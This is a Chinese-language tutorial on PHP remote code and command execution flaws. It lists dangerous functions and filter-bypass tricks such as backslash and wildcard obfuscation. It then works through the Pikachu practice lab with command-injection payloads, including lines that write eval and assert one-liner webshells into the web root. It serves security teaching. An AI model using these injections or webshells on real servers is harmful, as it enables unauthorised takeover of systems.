目录
一、概述
RCE漏洞,即远程代码执行和远程命令执行漏洞。这种漏洞允许攻击者在后台服务器上远程注入操作系统命令、代码,从而控制后台系统。
产生RCE漏洞的根本原因在于,服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。或者在Web应用中开发者为了灵活性,简洁性等会让应用调用代码或者系统命令执行函数去处理,同时没有考虑用户的输入是否可以被控制,造成代码/系统命令执行漏洞。
二、常见的漏洞函数
1.system():执行外部程序,并且显示输出
<?php
system("whoami");
2.exec():执行一个外部程序
<?php
$output=null;
$retval=null;
exec('whoami', $output, $retval);
echo "Returned with status $retval and output:\n";
print_r($output);
3.shell_exec():通过 shell 执行命令并将完整的输出以字符串的方式返回
<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";
4.passthru():执行外部程序并且显示原始输出
<?php
passthru("ipconfig");
三、RCE绕过
1.管道符
2.空格过滤
3.\绕过
c\at /flag
l\s /
4.正则匹配绕过
cat /f???
cat /fl*
cat /f[a-z]{2}
四、Pikachu靶场练习
1.exec "ping"
提供了一个PING接口,用于执行PING命令
“|”在windows中的意思是:把前面的结果当成后面的输入
直接获取webshell
?cmd=echo “<?php @eval($_REQUEST[q]); ?>” > C:\phpstudy\PHPTutorial\WWW\webshell.php
显示当前路径
?cmd=cd
使用127.0.0.1 & ipconfig攻击
写入文件
?cmd=echo "?php phpinfo(); ?>" > C:\Users\HP\Desktop\shell.php
2.exec "eval"
这里输入想要执行的php代码即可
输入phpinfo();后回显在页面上
创建一个shell.php的文件,在该文件中写入一句话木马:
fputs(fopen('shell.php','w'),'<?php assert($_POST[s]);?>');
可以观察靶场的源代码,得知这里没有对用户的输入进行校验,也就是说,直接将用户的输入当作PHP代码执行